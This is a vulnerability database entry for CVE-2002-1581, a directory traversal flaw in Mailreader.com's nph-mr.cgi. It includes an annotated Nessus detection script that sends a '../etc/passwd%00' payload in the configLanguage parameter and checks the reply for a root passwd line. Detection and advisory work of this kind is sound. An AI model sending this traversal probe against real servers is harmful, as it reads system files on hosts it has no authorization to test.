Vulnerabilities > CVE-2002-1581

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
mailreader-com
debian
nessus
exploit available

Summary

Directory traversal vulnerability in nph-mr.cgi in Mailreader.com 2.3.20 through 2.3.31 allows remote attackers to view arbitrary files via .. (dot dot) sequences and a null byte (%00) in the configLanguage parameter.

Exploit-Db

description: MailReader.com 2.3.x NPH-MR.CGI File Disclosure Vulnerability. CVE-2002-1581. Webapps exploit for cgi platform
id: EDB-ID:21966
last seen: 2016-02-02
modified: 2002-10-28
published: 2002-10-28
reporter: pokleyzz
source: https://www.exploit-db.com/download/21966/
title: MailReader.com 2.3.x NPH-MR.CGI File Disclosure Vulnerability

Nessus

  • NASL family: CGI abuses
    NASL id: MAILREADER.NASL
    description: Mailreader.com software is installed. A directory traversal flaw allows anybody to read arbitrary files on your system.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 11780
    published: 2003-06-26
    reporter: This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/11780
    title: Mailreader 2.3.30 - 2.3.31 Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    # References:
    # Date: Mon, 28 Oct 2002 17:48:04 +0800
    # From: "pokleyzz" <[email protected]>
    # To: "bugtraq" <[email protected]>, 
    #  "Shaharil Abdul Malek" <[email protected]>, 
    #  "sk" <[email protected]>, "pokley" <[email protected]>, 
    #  "Md Nazri Ahmad" <[email protected]> 
    # Subject: SCAN Associates Advisory : Multiple vurnerabilities on mailreader.com
    #
    
    include("compat.inc");
    
    # Registration block: when `description` is set, the script only declares
    # its metadata (ids, references, risk attributes, scheduling hints) and
    # exits at the end of the block, before any request is sent.
    if(description)
    {
      script_id(11780);
      script_version("1.22");
      # Two CVE ids are declared here. The only request visible further down in
      # this script exercises the configLanguage traversal in nph-mr.cgi, so a
      # hit confirms that issue only.
      script_cve_id("CVE-2002-1581", "CVE-2002-1582");
      script_bugtraq_id(5393, 6055, 6058);
    
      # NOTE(review): the title scopes the finding to 2.3.30 - 2.3.31, but no
      # statement in this script reads a version number; the result is based on
      # the response to the traversal probe alone.
      script_name(english:"Mailreader 2.3.30 - 2.3.31 Multiple Vulnerabilities");
    
     script_set_attribute(attribute:"synopsis", value:
    "It is possible to access arbitrary file on the remote host." );
     script_set_attribute(attribute:"description", value:
    "Mailreader.com software is installed. A directory traversal flaw 
    allows anybody to read arbitrary files on your system." );
     # Remediation recorded by the plugin: move to the fixed release.
     script_set_attribute(attribute:"solution", value:
    "Upgrade to v2.3.32 or later" );
     # CVSS v2 base: network reachable, low complexity, no authentication,
     # partial confidentiality impact, no integrity or availability impact.
     script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
     # NOTE(review): E:U is the CVSS v2 "unproven" exploitability value, while
     # the two attributes below state that no exploit is required and that one
     # is available. The fields disagree; for prioritisation treat the issue as
     # trivially exploitable.
     script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
     script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
     script_set_attribute(attribute:"exploit_available", value:"true");
    
     script_set_attribute(attribute:"plugin_publication_date", value: "2003/06/26");
     script_set_attribute(attribute:"vuln_publication_date", value: "2002/10/28");
     script_cvs_date("Date: 2018/06/13 18:56:27");
    script_set_attribute(attribute:"plugin_type", value:"remote");
    script_end_attributes();
    
    
      # NOTE(review): the summary mentions a version-number check; only the
      # traversal check is present in the visible code.
      script_summary(english:"Checks directory traversal & version number of mailreader.com software");
      # ACT_ATTACK: the check sends a real traversal request to the target
      # instead of inferring the flaw from a banner.
      script_category(ACT_ATTACK);
      script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
      script_family(english:"CGI abuses");
      # Plugins named here are declared as prerequisites; presumably they
      # supply the web-service and CGI-directory data used later - confirm
      # against the scanner's knowledge-base documentation.
      script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl", "webmirror.nasl");
      script_require_ports("Services/www", 80);
      # Presumably prevents the check from running when CGI scanning is turned
      # off in the scan policy - verify.
      script_exclude_keys("Settings/disable_cgi_scanning");
    
      exit(0);
    }
    
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    
    # Active check for the nph-mr.cgi configLanguage directory traversal.
    #
    # For every directory returned by cgi_dirs() one GET request is sent and
    # the target is reported only if the response both carries the Mailreader
    # banner and contains a line shaped like the root entry of a passwd file.
    # Requiring both markers keeps false positives low.
    #
    # Reading the result as a defender:
    #  - A clean result is not proof of absence. The probe uses a fixed depth
    #    of "../" segments and a Unix-only target file, and it only visits the
    #    directories cgi_dirs() returns.
    #  - The fix recorded in this plugin's metadata is an upgrade to v2.3.32
    #    or later.
    #  - Requests to nph-mr.cgi whose configLanguage value contains ".." or
    #    "%00" are the pattern to look for in web-server access logs.
    port = get_http_port(default:80);
    
    # Fixed query string appended to each candidate CGI directory.
    probe = "/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00";
    
    foreach dir (make_list(cgi_dirs()))
    {
      res = http_send_recv3(method:"GET", port:port, item:strcat(dir, probe));
    
      # No reply at all: stop the whole check and report the server as silent.
      if (isnull(res))
        exit(1, "The web server on port "+port+" did not answer");
    
      # Status line, headers and body are joined so both markers can be
      # searched in a single string.
      page = strcat(res[0], res[1], '\r\n', res[2]);
    
      # Skip responses that were not produced by Mailreader.
      if ("Powered by Mailreader.com" >!< page) continue;
    
      # Skip responses that do not contain a root-style passwd entry.
      if (page !~ "root:[^:]*:0:[01]:") continue;
    
      security_warning(port);
      exit(0);
    }
    
    
  • NASL family: Debian Local Security Checks
    NASL id: DEBIAN_DSA-534.NASL
    description: A directory traversal vulnerability was discovered in mailreader whereby remote attackers could view arbitrary files with the privileges of the nph-mr.cgi process (by default, www-data) via relative paths and a null byte in the configLanguage parameter.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 15371
    published: 2004-09-29
    reporter: This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/15371
    title: Debian DSA-534-1 : mailreader - directory traversal